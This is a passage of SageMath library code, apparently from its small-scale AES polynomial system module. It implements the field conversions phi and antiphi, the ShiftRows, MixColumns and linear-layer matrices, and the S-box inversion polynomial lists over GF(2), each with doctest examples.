elif isinstance(d, (list, tuple)):
if len(d) == self.r*self.c:
l = flatten([self.phi(x) for x in d], (Vector_modn_dense,list,tuple))
return Matrix(k, r*c*e, 1, l)
elif len(d) == self.r*self.c*self.e:
return Matrix(k, r*c*e, 1, d)
else:
raise TypeError
else:
raise TypeError
def is_vector(self, d):
"""
Return ``True`` if the given matrix satisfies the conditions
for a vector as it appears in the algebraic expression of
``self``.
INPUT:
- ``d`` - matrix
EXAMPLES::
sage: sr = mq.SR(gf2=True)
sage: sr
SR(1,1,1,4)
sage: k = sr.base_ring()
sage: A = Matrix(k, 1, 1, [k.gen()])
sage: B = sr.vector(A)
sage: sr.is_vector(A)
False
sage: sr.is_vector(B)
True
"""
return is_Matrix(d) and \
d.nrows() == self.r*self.c*self.e and \
d.ncols() == 1 and \
d.base_ring() == GF(2)
def phi(self, l, diffusion_matrix=False):
r"""
The operation `\phi` from [MR2002]_
Given a list/matrix of elements in `\GF{2^e}`, return a
matching list/matrix of elements in `\GF{2}`.
INPUT:
- ``l`` - element to perform `\phi` on.
- ``diffusion_matrix`` - if ``True``, the given matrix ``l`` is
transformed to a matrix which performs the same operation
over `\GF{2}` as ``l`` over `\GF{2^n}` (default: ``False``).
EXAMPLES::
sage: sr = mq.SR(2, 1, 2, 4, gf2=True)
sage: k = sr.base_ring()
sage: A = matrix(k, 1, 2, [k.gen(), 0] )
sage: sr.phi(A)
[0 0]
[0 0]
[1 0]
[0 0]
"""
ret = []
r, c, e = self.r, self.c, self.e
# handle diffusion layer matrices first
if is_Matrix(l) and diffusion_matrix and \
l.nrows() == r*c and l.ncols() == r*c and \
l.base_ring() == self.k:
B = Matrix(GF(2), r*c*e, r*c*e)
for x in range(r*c):
for y in range(r*c):
T = self._mul_matrix(l[x, y])
self._insert_matrix_into_matrix(B, T, x*e, y*e)
return B
# ground field elements
if l in self.k:
return list(reversed(l._vector_()))
# remaining matrices
if is_Matrix(l):
for x in l.transpose().list():
ret += list(reversed(x._vector_()))
# or lists
else:
for x in l:
ret += list(reversed(x._vector_()))
if isinstance(l, list):
return ret
elif isinstance(l, tuple):
return tuple(ret)
elif is_Matrix(l):
return Matrix(GF(2), l.ncols(), l.nrows()*self.e, ret).transpose()
else: raise TypeError
    def antiphi(self, l):
        r"""
The operation `\phi^{-1}` from [MR2002]_ or the inverse of ``self.phi``.
INPUT:
- ``l`` - a vector in the sense of ``self.is_vector``
EXAMPLES::
sage: sr = mq.SR(gf2=True)
sage: A = sr.random_state_array()
sage: A
[a^2]
sage: sr.antiphi(sr.phi(A)) == A
True
"""
e = self.e
V = self.k.vector_space()
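        # Collect the GF(2) coordinates e at a time and map each chunk back
        # to a base-field element, undoing the bit reversal applied by phi.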
if is_Matrix(l):
l2 = l.transpose().list()
else:
l2 = l
ret = []
for i in range(0, len(l2), e):
ret.append( self.k(V(list(reversed(l2[i:i+e])))) )
if isinstance(l, list):
return ret
elif isinstance(l, tuple):
return tuple(ret)
elif is_Matrix(l):
return Matrix(self.base_ring(), self.r *self.c, 1, ret)
else:
raise TypeError
def shift_rows_matrix(self):
"""
Return the ``ShiftRows`` matrix.
EXAMPLES::
sage: sr = mq.SR(1, 2, 2, 4, gf2=True)
sage: s = sr.random_state_array()
sage: r1 = sr.shift_rows(s)
sage: r2 = sr.state_array( sr.shift_rows_matrix() * sr.vector(s) )
sage: r1 == r2
True
"""
r = self.r
c = self.c
k = self.k
bs = r*c
shift_rows = Matrix(k, r*c, r*c)
for x in range(0, c):
for y in range(0, r):
_r = ((x*r)+y)
_c = ((x*r)+((r+1)*y)) % bs
shift_rows[_r, _c] = 1
return self.phi(shift_rows, diffusion_matrix=True)
def mix_columns_matrix(self):
"""
Return the ``MixColumns`` matrix.
EXAMPLES::
sage: sr = mq.SR(1, 2, 2, 4, gf2=True)
sage: s = sr.random_state_array()
sage: r1 = sr.mix_columns(s)
sage: r2 = sr.state_array(sr.mix_columns_matrix() * sr.vector(s))
sage: r1 == r2
True
"""
r = self.r
c = self.c
k = self.k
a = k.gen()
if r == 1:
M = Matrix(k, r, r, 1)
elif r == 2:
M = Matrix(k, r, r, [a+1, a, a, a+1])
elif r == 4:
M = Matrix(k, r, [a, a+1, 1, 1, \
1, a, a+1, 1, \
1, 1, a, a+1, \
a+1, 1, 1, a])
mix_columns = Matrix(k, r*c, r*c)
for i in range(c):
self._insert_matrix_into_matrix(mix_columns, M, r*i, r*i)
return self.phi(mix_columns, diffusion_matrix=True)
def lin_matrix(self, length=None):
"""
Return the ``Lin`` matrix.
If no ``length`` is provided, the standard state space size is
used. The key schedule calls this method with an explicit
length argument because only ``self.r`` S-Box applications are
performed in the key schedule.
INPUT:
- ``length`` - length of state space (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4, gf2=True)
sage: sr.lin_matrix()
[1 0 1 1]
[1 1 0 1]
[1 1 1 0]
[0 1 1 1]
"""
r, c, e = self.r, self.c, self.e
if length is None:
length = r*c
if e == 8:
Z = Matrix(GF(2), 8, 8, [1, 0, 0, 0, 1, 1, 1, 1, \
1, 1, 0, 0, 0, 1, 1, 1, \
1, 1, 1, 0, 0, 0, 1, 1, \
1, 1, 1, 1, 0, 0, 0, 1, \
1, 1, 1, 1, 1, 0, 0, 0, \
0, 1, 1, 1, 1, 1, 0, 0, \
0, 0, 1, 1, 1, 1, 1, 0, \
0, 0, 0, 1, 1, 1, 1, 1])
else:
Z = Matrix(GF(2), 4, 4, [1, 1, 1, 0, \
0, 1, 1, 1, \
1, 0, 1, 1, \
1, 1, 0, 1])
        Z = Z.transpose()  # account for endianness mismatch
lin = Matrix(GF(2), length*e, length*e)
for i in range(length):
self._insert_matrix_into_matrix(lin, Z, i*e, i*e)
return lin
def _mul_matrix(self, x):
r"""
        Given an element `x` in ``self.base_ring()``, return an `e \times e`
        matrix over `\GF{2}` which acts on coefficient vectors of length
        ``e`` in the same way that multiplication by `x` acts on `\GF{2^e}`.
INPUT:
- ``x`` - an element in self.base_ring()
EXAMPLES::
sage: sr = mq.SR(gf2=True)
sage: a = sr.k.gen()
sage: A = sr._mul_matrix(a^2+1)
sage: sr.antiphi( A * sr.vector([a+1]) )
[a^3 + a^2 + a + 1]
::
sage: (a^2 + 1)*(a+1)
a^3 + a^2 + a + 1
"""
        k = self.k
        e = self.e
        a = k.gen()
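        # Each column of the result is the GF(2) coefficient vector of x*a^i
        # for one power-basis element a^i, listed most significant bit first
        # to match the ordering used by phi()/vector().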
columns = []
for i in reversed(range(e)):
columns.append( list(reversed((x * a**i)._vector_())) )
return Matrix(GF(2), e, e, columns).transpose()
def _square_matrix(self):
"""
        Return a matrix of dimension ``self.e`` x ``self.e`` which performs
        the squaring operation over `GF(2^e)` on coefficient vectors of
        length ``e``.
EXAMPLES::
sage: sr = mq.SR(gf2=True)
sage: a = sr.k.gen()
sage: S = sr._square_matrix()
sage: sr.antiphi( S * sr.vector([a^3+1]) )
[a^3 + a^2 + 1]
::
sage: (a^3 + 1)^2
a^3 + a^2 + 1
"""
a = self.k.gen()
e = self.e
columns = []
for i in reversed(range(e)):
columns.append( list(reversed(((a**i)**2)._vector_())) )
return Matrix(GF(2), e , e, columns).transpose()
def inversion_polynomials_single_sbox(self, x=None, w=None, biaffine_only=None, correct_only=None):
"""
Return inversion polynomials of a single S-Box.
INPUT:
        - ``x`` - output variables (default: ``None``)
        - ``w`` - input variables (default: ``None``)
        - ``biaffine_only`` - only include biaffine polynomials (default: object default)
        - ``correct_only`` - only include correct polynomials (default: object default)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 8, gf2=True)
sage: len(sr.inversion_polynomials_single_sbox())
24
sage: len(sr.inversion_polynomials_single_sbox(correct_only=True))
23
sage: len(sr.inversion_polynomials_single_sbox(biaffine_only=False))
40
sage: len(sr.inversion_polynomials_single_sbox(biaffine_only=False, correct_only=True))
39
sage: sr = mq.SR(1, 1, 1, 8, gf2=True)
sage: l0 = sr.inversion_polynomials_single_sbox(); len(l0)
24
sage: l1 = sr.inversion_polynomials_single_sbox(correct_only=True); len(l1)
23
sage: l2 = sr.inversion_polynomials_single_sbox(biaffine_only=False); len(l2)
40
sage: l3 = sr.inversion_polynomials_single_sbox(biaffine_only=False, correct_only=True); len(l3)
39
sage: set(l0) == set(sr._inversion_polynomials_single_sbox())
True
sage: set(l1) == set(sr._inversion_polynomials_single_sbox(correct_only=True))
True
sage: set(l2) == set(sr._inversion_polynomials_single_sbox(biaffine_only=False))
True
sage: set(l3) == set(sr._inversion_polynomials_single_sbox(biaffine_only=False, correct_only=True))
True
sage: sr = mq.SR(1, 1, 1, 4, gf2=True)
sage: l0 = sr.inversion_polynomials_single_sbox(); len(l0)
12
sage: l1 = sr.inversion_polynomials_single_sbox(correct_only=True); len(l1)
11
sage: l2 = sr.inversion_polynomials_single_sbox(biaffine_only=False); len(l2)
20
sage: l3 = sr.inversion_polynomials_single_sbox(biaffine_only=False, correct_only=True); len(l3)
19
sage: set(l0) == set(sr._inversion_polynomials_single_sbox())
True
sage: set(l1) == set(sr._inversion_polynomials_single_sbox(correct_only=True))
True
sage: set(l2) == set(sr._inversion_polynomials_single_sbox(biaffine_only=False))
True
sage: set(l3) == set(sr._inversion_polynomials_single_sbox(biaffine_only=False, correct_only=True))
True
"""
e = self.e
if biaffine_only is None:
biaffine_only = self._biaffine_only
if correct_only is None:
correct_only = self._correct_only
if x is None and w is None:
# make sure it prints like in the book.
names = ["w%d" % i for i in reversed(range(e))] + ["x%d"%i for i in reversed(range(e))]
P = PolynomialRing(GF(2), e*2, names, order='lex')
x = P.gens()[e:]
w = P.gens()[:e]
else:
if isinstance(x, (tuple, list)):
P = x[0].parent()
elif is_Matrix(x):
P = x.base_ring()
else:
raise TypeError("x not understood")
if is_Matrix(x):
x = x.column(0).list()
if is_Matrix(w):
w = w.column(0).list()
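        # The lists below are the explicit GF(2) expansions of the biaffine
        # inversion relations between w and x; when correct_only is False the
        # (generically true) relation w*x = 1 is appended, and when
        # biaffine_only is False additional quadratic relations are added.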
if e == 4:
w3,w2,w1,w0 = w
x3,x2,x1,x0 = x
l = [w3*x3 + w3*x0 + w2*x1 + w1*x2 + w0*x3,
w3*x3 + w3*x2 + w2*x3 + w2*x0 + w1*x1 + w0*x2,
w3*x2 + w3*x1 + w2*x3 + w2*x2 + w1*x3 + w1*x0 + w0*x1,
w3*x3 + w3*x2 + w3*x0 + w2*x2 + w1*x3 + w1*x1 + w0*x3 + x3,
w3*x1 + w2*x3 + w2*x2 + w2*x0 + w1*x2 + w0*x3 + w0*x1 + x2,
w3*x3 + w3*x2 + w3*x1 + w2*x1 + w1*x3 + w1*x2 + w1*x0 + w0*x2 + x1,
w3*x2 + w2*x3 + w2*x1 + w1*x3 + w0*x2 + w0*x0 + x0,
w3*x3 + w3*x1 + w3*x0 + w3 + w2*x3 + w2*x2 + w1*x1 + w0*x3,
w3*x2 + w3*x0 + w2*x2 + w2*x1 + w2 + w1*x3 + w1*x0 + w0*x2,
w3*x3 + w3*x1 + w2*x3 + w2*x1 + w2*x0 + w1*x3 + w1*x2 + w1 + w0*x1,
w3*x2 + w3*x1 + w2*x3 + w2*x0 + w1*x2 + w0*x0 + w0]
if not correct_only:
l.append(w3*x1 + w2*x2 + w1*x3 + w0*x0 + 1)
if not biaffine_only:
l.extend([w3*x2 + w3*x1 + w3*x0 + w2*x3 + w2*x1 + w1*x3 + w1*x2 + w0*x3 + x3**2 + x3*x2 + x3*x1 + x2**2 + x1**2,
w3*x2 + w2*x2 + w2*x1 + w2*x0 + w1*x3 + w1*x1 + w0*x3 + w0*x2 + x3*x2 + x3*x1 + x3*x0 + x2**2 + x2*x1 + x2*x0 + x1*x0,
w3*x2 + w3*x1 + w2*x2 + w1*x2 + w1*x1 + w1*x0 + w0*x3 + w0*x1 + x3**2 + x3*x2 + x2*x0 + x1*x0,
w3*x3 + w3*x1 + w2*x3 + w2*x2 + w1*x3 + w0*x3 + w0*x2 + w0*x1 + w0*x0 + x3*x1 + x2*x1 + x2*x0 + x0**2,
w3**2 + w3*w2 + w3*w1 + w3*x2 + w3*x1 + w3*x0 + w2**2 + w2*x3 + w2*x1 + w1**2 + w1*x3 + w1*x2 + w0*x3,
w3*w2 + w3*w1 + w3*w0 + w3*x1 + w3*x0 + w2**2 + w2*w1 + w2*w0 + w2*x3 + w2*x2 + w2*x0 + w1*w0 + w1*x2 + w1*x1 + w0*x2,
w3**2 + w3*w2 + w3*x0 + w2*w0 + w2*x3 + w2*x2 + w2*x1 + w1*w0 + w1*x3 + w1*x1 + w1*x0 + w0*x1,
w3*w1 + w3*x3 + w3*x2 + w3*x1 + w3*x0 + w2*w1 + w2*w0 + w2*x2 + w2*x0 + w1*x3 + w1*x0 + w0**2 + w0*x0])
return l
else:
w7,w6,w5,w4,w3,w2,w1,w0 = w
x7,x6,x5,x4,x3,x2,x1,x0 = x
l = [w7*x7 + w7*x5 + w7*x4 + w7*x0 + w6*x6 + w6*x5 + w6*x1 + w5*x7 + w5*x6 + w5*x2 + w4*x7 + w4*x3 + w3*x4 + w2*x5 + w1*x6 + w0*x7,
w7*x6 + w7*x4 + w7*x3 + w6*x7 + w6*x5 + w6*x4 + w6*x0 + w5*x6 + w5*x5 + w5*x1 + w4*x7 + w4*x6 + w4*x2 + w3*x7 + w3*x3 + w2*x4 + w1*x5 + w0*x6,
w7*x5 + w7*x3 + w7*x2 + w6*x6 + w6*x4 + w6*x3 + w5*x7 + w5*x5 + w5*x4 + w5*x0 + w4*x6 + w4*x5 + w4*x1 + w3*x7 + w3*x6 + w3*x2 + w2*x7 + w2*x3 + w1*x4 + w0*x5,
w7*x7 + w7*x4 + w7*x2 + w7*x1 + w6*x5 + w6*x3 + w6*x2 + w5*x6 + w5*x4 + w5*x3 + w4*x7 + w4*x5 + w4*x4 + w4*x0 + w3*x6 + w3*x5 + w3*x1 + w2*x7 + w2*x6 + w2*x2 + w1*x7 + w1*x3 + w0*x4,
w7*x7 + w7*x6 + w7*x5 + w7*x4 + w7*x3 + w7*x1 + w6*x7 + w6*x6 + w6*x5 + w6*x4 + w6*x2 + w5*x7 + w5*x6 + w5*x5 + w5*x3 + w4*x7 + w4*x6 + w4*x4 + w3*x7 + w3*x5 + w3*x0 + w2*x6 + w2*x1 \
+ w1*x7 + w1*x2 + w0*x3,
w7*x6 + w7*x3 + w7*x2 + w6*x7 + w6*x4 + w6*x3 + w5*x5 + w5*x4 + w4*x6 + w4*x5 + w3*x7 + w3*x6 + w2*x7 + w2*x0 + w1*x1 + w0*x2,
w7*x7 + w7*x5 + w7*x2 + w7*x1 + w6*x6 + w6*x3 + w6*x2 + w5*x7 + w5*x4 + w5*x3 + w4*x5 + w4*x4 + w3*x6 + w3*x5 + w2*x7 + w2*x6 + w1*x7 + w1*x0 + w0*x1,
w7*x6 + w7*x5 + w7*x2 + w7*x0 + w6*x7 + w6*x4 + w6*x3 + w5*x7 + w5*x6 + w5*x3 + w5*x1 + w4*x5 + w4*x4 + w3*x7 + w3*x4 + w3*x2 + w2*x6 + w2*x5 + w1*x5 + w1*x3 + w0*x7 + w0*x6 + x7,
w7*x6 + w7*x3 + w7*x2 + w6*x6 + w6*x5 + w6*x2 + w6*x0 + w5*x7 + w5*x4 + w5*x3 + w4*x7 + w4*x6 + w4*x3 + w4*x1 + w3*x5 + w3*x4 + w2*x7 + w2*x4 + w2*x2 + w1*x6 + w1*x5 + w0*x5 + w0*x3 \
+ x6,
w7*x7 + w7*x5 + w7*x4 + w7*x1 + w6*x6 + w6*x3 + w6*x2 + w5*x6 + w5*x5 + w5*x2 + w5*x0 + w4*x7 + w4*x4 + w4*x3 + w3*x7 + w3*x6 + w3*x3 + w3*x1 + w2*x5 + w2*x4 + w1*x7 + w1*x4 + w1*x2 \
+ w0*x6 + w0*x5 + x5,
w7*x7 + w7*x5 + w7*x2 + w7*x1 + w6*x7 + w6*x5 + w6*x4 + w6*x1 + w5*x6 + w5*x3 + w5*x2 + w4*x6 + w4*x5 + w4*x2 + w4*x0 + w3*x7 + w3*x4 + w3*x3 + w2*x7 + w2*x6 + w2*x3 + w2*x1 + w1*x5 \
+ w1*x4 + w0*x7 + w0*x4 + w0*x2 + x4,
w7*x5 + w7*x4 + w7*x3 + w7*x2 + w6*x5 + w6*x4 + w6*x3 + w6*x2 + w6*x1 + w5*x6 + w5*x5 + w5*x4 + w5*x3 + w4*x6 + w4*x5 + w4*x4 + w4*x3 + w4*x2 + w3*x7 + w3*x6 + w3*x5 + w3*x4 + w3*x0 \
+ w2*x7 + w2*x6 + w2*x5 + w2*x4 + w2*x3 + w1*x7 + w1*x6 + w1*x5 + w1*x1 + w0*x7 + w0*x6 + w0*x5 + w0*x4 + x3,
w7*x7 + w7*x6 + w7*x5 + w7*x4 + w7*x3 + w7*x1 + w6*x7 + w6*x5 + w6*x2 + w5*x7 + w5*x6 + w5*x5 + w5*x4 + w5*x2 + w4*x6 + w4*x3 + w3*x7 + w3*x6 + w3*x5 + w3*x3 + w2*x7 + w2*x4 + w2*x0 \
+ w1*x7 + w1*x6 + w1*x4 + w0*x5 + w0*x1 + x2,
w7*x6 + w7*x4 + w7*x1 + w6*x7 + w6*x6 + w6*x5 + w6*x4 + w6*x3 + w6*x1 + w5*x7 + w5*x5 + w5*x2 + w4*x7 + w4*x6 + w4*x5 + w4*x4 + w4*x2 + w3*x6 + w3*x3 + w2*x7 + w2*x6 + w2*x5 + w2*x3 \
+ w1*x7 + w1*x4 + w1*x0 + w0*x7 + w0*x6 + w0*x4 + x1,
w7*x7 + w7*x4 + w7*x3 + w6*x7 + w6*x6 + w6*x3 + w6*x1 + w5*x5 + w5*x4 + w4*x7 + w4*x4 + w4*x2 + w3*x6 + w3*x5 + w2*x5 + w2*x3 + w1*x7 + w1*x6 + w0*x6 + w0*x4 + w0*x0 + x0,
w7*x6 + w7*x5 + w7*x3 + w7*x0 + w7 + w6*x7 + w6*x5 + w6*x2 + w6*x0 + w5*x7 + w5*x4 + w5*x2 + w5*x1 + w4*x6 + w4*x4 + w4*x3 + w3*x6 + w3*x5 + w3*x1 + w2*x7 + w2*x3 + w1*x5 + w0*x7,
w7*x5 + w7*x4 + w7*x2 + w6*x7 + w6*x6 + w6*x4 + w6*x1 + w6 + w5*x6 + w5*x3 + w5*x1 + w5*x0 + w4*x5 + w4*x3 + w4*x2 + w3*x7 + w3*x5 + w3*x4 + w3*x0 + w2*x7 + w2*x6 + w2*x2 + w1*x4 \
+ w0*x6,
w7*x7 + w7*x4 + w7*x3 + w7*x1 + w6*x6 + w6*x5 + w6*x3 + w6*x0 + w5*x7 + w5*x5 + w5*x2 + w5*x0 + w5 + w4*x7 + w4*x4 + w4*x2 + w4*x1 + w3*x6 + w3*x4 + w3*x3 + w2*x6 + w2*x5 + w2*x1 \
+ w1*x7 + w1*x3 + w0*x5,
w7*x7 + w7*x6 + w7*x3 + w7*x2 + w7*x0 + w6*x5 + w6*x4 + w6*x2 + w5*x7 + w5*x6 + w5*x4 + w5*x1 + w4*x6 + w4*x3 + w4*x1 + w4*x0 + w4 + w3*x5 + w3*x3 + w3*x2 + w2*x7 + w2*x5 + w2*x4 \
+ w2*x0 + w1*x7 + w1*x6 + w1*x2 + w0*x4,
w7*x3 + w7*x2 + w7*x1 + w7*x0 + w6*x5 + w6*x4 + w6*x3 + w6*x2 + w6*x1 + w6*x0 + w5*x7 + w5*x6 + w5*x5 + w5*x4 + w5*x3 + w5*x2 + w5*x1 + w5*x0 + w4*x7 + w4*x6 + w4*x5 + w4*x4 \
+ w4*x3 + w4*x2 + w4*x0 + w3*x7 + w3*x6 + w3*x5 + w3*x4 + w3*x2 + w3 + w2*x7 + w2*x6 + w2*x4 + w1*x6 + w1*x1 + w0*x3,
w7*x7 + w7*x6 + w7*x5 + w7*x3 + w7*x2 + w7*x1 + w6*x7 + w6*x5 + w6*x4 + w6*x3 + w6*x1 + w5*x7 + w5*x6 + w5*x5 + w5*x3 + w5*x0 + w4*x7 + w4*x5 + w4*x2 + w4*x1 + w3*x7 + w3*x4 \
+ w3*x3 + w2*x6 + w2*x5 + w2 + w1*x7 + w1*x0 + w0*x2,
w7*x6 + w7*x5 + w7*x4 + w7*x2 + w7*x1 + w7*x0 + w6*x7 + w6*x6 + w6*x4 + w6*x3 + w6*x2 + w6*x0 + w5*x6 + w5*x5 + w5*x4 + w5*x2 + w4*x7 + w4*x6 + w4*x4 + w4*x1 + w4*x0 + w3*x6 \
+ w3*x3 + w3*x2 + w2*x5 + w2*x4 + w1*x7 + w1*x6 + w1 + w0*x1,
w7*x7 + w7*x6 + w7*x4 + w7*x1 + w6*x6 + w6*x3 + w6*x1 + w6*x0 + w5*x5 + w5*x3 + w5*x2 + w4*x7 + w4*x5 + w4*x4 + w4*x0 + w3*x7 + w3*x6 + w3*x2 + w2*x4 + w1*x6 + w0*x0 + w0]
if not correct_only:
l.append(w7*x6 + w7*x5 + w7*x1 + w6*x7 + w6*x6 + w6*x2 + w5*x7 + w5*x3 + w4*x4 + w3*x5 + w2*x6 + w1*x7 + w0*x0 + 1)
if not biaffine_only:
l.extend([w7**2 + w7*w6 + w7*w3 + w7*w1 + w7*x7 + w7*x6 + w7*x5 + w7*x2 + w7*x1 + w7*x0 + w6**2 + w6*w0 + w6*x6 + w6*x5 + w6*x4 + w6*x3 + w6*x1 + w6*x0 + w5**2 + w5*w4 + w5*w3 \
+ w5*w2 + w5*x7 + w5*x5 + w5*x4 + w5*x1 + w5*x0 + w4**2 + w4*w2 + w4*w0 + w4*x5 + w4*x4 + w4*x2 + w3*w2 + w3*x6 + w3*x3 + w3*x1 + w3*x0 + w2*x7 + w2*x5 + w2*x4 \
+ w2*x0 + w1*x4 + w0**2 + w0*x0,
w7*x6 + w7*x4 + w7*x1 + w6*x7 + w6*x6 + w6*x5 + w6*x2 + w5*x7 + w5*x6 + w5*x5 + w5*x4 + w5*x3 + w5*x1 + w4*x5 + w4*x4 + w4*x3 + w4*x1 + w4*x0 + w3*x7 + w3*x5 + w3*x2 \
+ w2*x7 + w2*x6 + w2*x3 + w1*x7 + w1*x6 + w1*x5 + w1*x4 + w1*x2 + w0*x6 + w0*x5 + w0*x4 + w0*x2 + w0*x1 + x7**2 + x7*x6 + x7*x5 + x7*x3 + x7*x1 + x7*x0 + x6*x2 \
+ x6*x1 + x5*x4 + x5*x3 + x5*x2 + x5*x1 + x4*x3 + x4*x2 + x4*x1 + x3**2 + x3*x2 + x2*x1 + x2*x0,
w7*x5 + w7*x4 + w7*x3 + w7*x1 + w7*x0 + w6*x7 + w6*x5 + w6*x2 + w5*x7 + w5*x6 + w5*x3 + w4*x7 + w4*x6 + w4*x5 + w4*x4 + w4*x2 + w3*x6 + w3*x5 + w3*x4 + w3*x2 + w3*x1 \
+ w2*x6 + w2*x3 + w1*x7 + w1*x4 + w0*x7 + w0*x6 + w0*x5 + w0*x3 + x7*x3 + x7*x2 + x6*x5 + x6*x4 + x6*x3 + x6*x2 + x6*x0 + x5*x4 + x5*x3 + x5*x2 + x4**2 + x4*x3 \
+ x3*x2 + x3*x1,
w7*w3 + w7*w2 + w7*x6 + w7*x5 + w7*x4 + w7*x1 + w7*x0 + w6*w5 + w6*w4 + w6*w3 + w6*w2 + w6*w0 + w6*x5 + w6*x4 + w6*x3 + w6*x2 + w6*x0 + w5*w4 + w5*w3 + w5*w2 + w5*x7 \
+ w5*x6 + w5*x4 + w5*x3 + w5*x0 + w4**2 + w4*w3 + w4*x7 + w4*x4 + w4*x3 + w4*x1 + w3*w2 + w3*w1 + w3*x7 + w3*x5 + w3*x2 + w3*x0 + w2*x6 + w2*x4 + w2*x3 + w1*x7 \
+ w1*x3 + w0*x7,
w7*x5 + w7*x2 + w7*x1 + w6*x7 + w6*x6 + w6*x5 + w6*x4 + w6*x2 + w6*x1 + w5*x5 + w5*x3 + w5*x2 + w4*x3 + w4*x2 + w4*x1 + w3*x6 + w3*x3 + w3*x2 + w3*x0 + w2*x7 + w2*x6 \
+ w2*x5 + w2*x3 + w2*x2 + w1*x6 + w1*x4 + w1*x3 + w0*x4 + w0*x3 + w0*x2 + x7*x5 + x7*x4 + x7*x1 + x7*x0 + x6*x0 + x5**2 + x5*x2 + x5*x1 + x5*x0 + x4**2 + x4*x0 \
+ x3*x2 + x3*x0 + x1**2,
w7*w6 + w7*w5 + w7*w4 + w7*w3 + w7*x7 + w7*x5 + w7*x4 + w7*x3 + w7*x0 + w6**2 + w6*w5 + w6*w4 + w6*w2 + w6*w1 + w6*w0 + w6*x7 + w6*x4 + w6*x3 + w6*x2 + w6*x1 + w5*w4 \
+ w5*w1 + w5*w0 + w5*x7 + w5*x6 + w5*x5 + w5*x3 + w5*x2 + w4*w2 + w4*w1 + w4*x7 + w4*x6 + w4*x3 + w4*x2 + w4*x0 + w3*w0 + w3*x7 + w3*x6 + w3*x4 + w3*x1 + w2**2 \
+ w2*x5 + w2*x3 + w2*x2 + w1*x7 + w1*x6 + w1*x2 + w0*x6,
w7*w5 + w7*w4 + w7*w1 + w7*w0 + w7*x6 + w7*x2 + w6*w0 + w6*x6 + w6*x3 + w6*x2 + w6*x1 + w5**2 + w5*w2 + w5*w1 + w5*w0 + w5*x7 + w5*x6 + w5*x5 + w5*x2 + w4**2 + w4*w0 \
+ w4*x6 + w4*x1 + w4*x0 + w3*w2 + w3*w0 + w3*x5 + w3*x4 + w3*x3 + w3*x2 + w3*x1 + w3*x0 + w2*x7 + w2*x6 + w2*x5 + w2*x4 + w2*x3 + w2*x2 + w2*x0 + w1**2 + w1*x7 \
+ w1*x6 + w1*x4 + w0*x3,
w7*x7 + w7*x6 + w7*x5 + w7*x2 + w6*x7 + w6*x6 + w6*x5 + w6*x4 + w6*x3 + w6*x1 + w5*x5 + w5*x4 + w5*x3 + w5*x1 + w5*x0 + w4*x7 + w4*x5 + w4*x2 + w3*x7 + w3*x6 + w3*x3 \
+ w2*x7 + w2*x6 + w2*x5 + w2*x4 + w2*x2 + w1*x6 + w1*x5 + w1*x4 + w1*x2 + w1*x1 + w0*x6 + w0*x3 + x7**2 + x7*x5 + x7*x3 + x6**2 + x6*x5 + x6*x2 + x6*x0 + x5**2 \
+ x4**2 + x4*x3 + x4*x2 + x4*x1 + x3**2 + x3*x1 + x2*x1,
w7**2 + w7*w6 + w7*w5 + w7*w3 + w7*w1 + w7*w0 + w7*x6 + w7*x5 + w7*x3 + w7*x2 + w7*x1 + w6*w2 + w6*w1 + w6*x7 + w6*x6 + w6*x5 + w6*x2 + w6*x1 + w6*x0 + w5*w4 + w5*w3 \
+ w5*w2 + w5*w1 + w5*x6 + w5*x5 + w5*x4 + w5*x3 + w5*x1 + w5*x0 + w4*w3 + w4*w2 + w4*w1 + w4*x7 + w4*x5 + w4*x4 + w4*x1 + w4*x0 + w3**2 + w3*w2 + w3*x5 + w3*x4 \
+ w3*x2 + w2*w1 + w2*w0 + w2*x6 + w2*x3 + w2*x1 + w2*x0 + w1*x7 + w1*x5 + w1*x4 + w1*x0 + w0*x4,
w7*x7 + w7*x5 + w7*x2 + w6*x7 + w6*x6 + w6*x3 + w5*x7 + w5*x6 + w5*x5 + w5*x4 + w5*x2 + w4*x6 + w4*x5 + w4*x4 + w4*x2 + w4*x1 + w3*x6 + w3*x3 + w2*x7 + w2*x4 + w1*x7 \
+ w1*x6 + w1*x5 + w1*x3 + w0*x7 + w0*x6 + w0*x5 + w0*x3 + w0*x2 + w0*x0 + x7**2 + x7*x6 + x7*x3 + x7*x1 + x6**2 + x6*x0 + x5**2 + x5*x4 + x5*x3 + x5*x2 + x4**2 \
+ x4*x2 + x4*x0 + x3*x2 + x0**2,
w7*x7 + w7*x6 + w7*x5 + w7*x4 + w7*x3 + w7*x1 + w6*x5 + w6*x4 + w6*x3 + w6*x1 + w6*x0 + w5*x7 + w5*x5 + w5*x2 + w4*x7 + w4*x6 + w4*x3 + w3*x7 + w3*x6 + w3*x5 + w3*x4 \
+ w3*x2 + w2*x6 + w2*x5 + w2*x4 + w2*x2 + w2*x1 + w1*x6 + w1*x3 + w0*x7 + w0*x4 + x7*x6 + x7*x5 + x7*x4 + x7*x3 + x6**2 + x6*x5 + x6*x4 + x6*x2 + x6*x1 + x6*x0 \
+ x5*x4 + x5*x1 + x5*x0 + x4*x2 + x4*x1 + x3*x0 + x2**2,
w7*x5 + w7*x4 + w7*x3 + w7*x2 + w6*x7 + w6*x1 + w5*x5 + w5*x4 + w5*x3 + w5*x2 + w5*x1 + w4*x7 + w4*x6 + w4*x4 + w4*x3 + w3*x6 + w3*x5 + w3*x4 + w3*x3 + w2*x2 + w2*x0 \
+ w1*x6 + w1*x5 + w1*x4 + w1*x3 + w1*x2 + w0*x7 + w0*x5 + w0*x4 + x7**2 + x7*x4 + x7*x2 + x6*x4 + x6*x3 + x6*x2 + x6*x1 + x5**2 + x5*x4 + x5*x3 + x5*x2 + x5*x0 \
+ x4*x3 + x4*x2 + x4*x1 + x3**2 + x2*x0 + x1*x0,
w7*x6 + w7*x5 + w7*x3 + w7*x2 + w6*x5 + w6*x4 + w6*x3 + w6*x2 + w5*x7 + w5*x1 + w4*x5 + w4*x4 + w4*x3 + w4*x2 + w4*x1 + w3*x7 + w3*x6 + w3*x4 + w3*x3 + w2*x6 + w2*x5 \
+ w2*x4 + w2*x3 + w1*x2 + w1*x0 + w0*x6 + w0*x5 + w0*x4 + w0*x3 + w0*x2 + x7*x5 + x7*x2 + x7*x0 + x6**2 + x6*x5 + x6*x2 + x6*x1 + x6*x0 + x5**2 + x5*x4 + x4**2 \
+ x4*x2 + x4*x1 + x4*x0 + x3**2 + x3*x2 + x1*x0,
